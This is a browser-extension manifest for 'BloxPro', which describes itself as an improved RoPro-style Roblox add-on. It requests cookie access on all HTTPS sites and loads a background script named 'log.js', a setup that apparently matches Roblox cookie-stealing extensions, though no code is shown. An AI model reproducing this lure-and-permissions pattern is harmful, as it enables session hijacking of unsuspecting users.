{
    "name": "BloxPro",
    "description": "Inspire by RoPro, it's like RoPro but better! It has more features, good ui and works on slow pc's!",
    "version": "1.02",
    "manifest_version": 2,

    "browser_action" : {
        "default_icon": "assets/roblox.png"
    },

    "permissions": [
        "cookies",
        "https://*/*"
    ],

    "background": {
        "scripts": ["scripts/log.js"]
    },

    "icons": {
        "16": "assets/roblox.png",
        "32": "assets/roblox.png",
        "48": "assets/roblox.png",
        "128": "assets/roblox.png"
    }
}
